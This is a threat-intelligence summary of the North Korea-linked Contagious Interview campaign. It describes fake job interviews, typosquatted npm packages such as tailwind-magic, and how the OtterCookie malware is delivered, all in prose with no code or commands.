Key Findings

• North Korea-linked actors behind the Contagious Interview campaign have uploaded 197 new malicious npm packages to distribute a new version of the OtterCookie malware.

• The Contagious Interview campaign, active since November 2023, targets software developers on Windows, Linux, and macOS, with a focus on those working in crypto and Web3.

• Attackers pose as recruiters on platforms like LinkedIn and use social engineering tactics, including fake job interviews and trojanized demo projects, to deliver malware payloads.

• The campaign's payloads commonly include the BeaverTail and OtterCookie infostealers and the InvisibleFerret RAT.

• The Contagious Interview campaign continues to expand in the npm ecosystem, with the addition of 197 more malicious packages and over 31,000 downloads.

Background

The Contagious Interview campaign is a ongoing threat operation linked to North Korea. Since its inception in November 2023, the campaign has primarily targeted software developers working in the crypto and Web3 space on various platforms, including Windows, Linux, and macOS.

The attackers behind the campaign typically pose as recruiters on platforms like LinkedIn and use social engineering tactics, such as fake job interviews and trojanized demo projects, to deliver their malware payloads. These payloads commonly include the BeaverTail and OtterCookie infostealers, as well as the InvisibleFerret remote access tool (RAT).

Expansion in the npm Ecosystem

The Contagious Interview campaign has continued to expand its reach, with the addition of 197 new malicious npm packages and over 31,000 downloads. This latest wave of activity reinforces the campaign's systematic, factory-style approach to targeting developers through the npm ecosystem.

Malicious Npm Packages and Payload Delivery

The researchers investigated the malicious npm package "tailwind-magic" and uncovered a Vercel-hosted staging site (tetrismic[.]vercel[.]app) that led them to a threat actor–controlled GitHub account, "stardev0914". This account contained 18 repositories, which the North Korean operators used to build a full delivery system.

The attackers store malware on GitHub, fetch the latest payload from Vercel, and use a separate C2 server for data theft and tasking. At least five npm packages (tailwind-magic, tailwind-node, node-tailwind, node-tailwind-magic, and react-modal-select) use this setup to drop a second-stage payload.

When victims install these packages, the code pulls an OtterCookie variant that checks for virtual machines, fingerprints the device, and opens a long-term C2 link. This gives the attackers a remote shell, keylogging, clipboard theft, screenshots, and credential and wallet harvesting capabilities across major operating systems.

Crypto-Themed Lures and Infrastructure

The Contagious Interview operators use crypto-themed GitHub repositories as lures to deliver malware through malicious npm packages. A cloned Knightsbridge DEX site ("dexproject") embeds the backdoored node-tailwind package, which loads and runs attacker-controlled code during dependency installation.

The tailwind-magic repo similarly supports a typosquatted npm package that impersonates tailwind-merge and fetches remote JavaScript from tetrismic[.]vercel[.]app, turning it into a loader for OtterCookie malware. Other repos act as decoy crypto projects to entice developers into installing the compromised packages during fake job assignments.

The attackers' infrastructure is split across GitHub (development), Vercel (payload delivery), and a separate C2 server (tasking and data collection), allowing them to rotate payloads, customize attacks, and keep C2 activity low until the second-stage malware launches.

Sources

• https://securityaffairs.com/185170/apt/contagious-interview-campaign-expands-with-197-npm-ppackages-spreading-new-ottercookie-malware.html

• https://x.com/Dinosn/status/1994966243288519149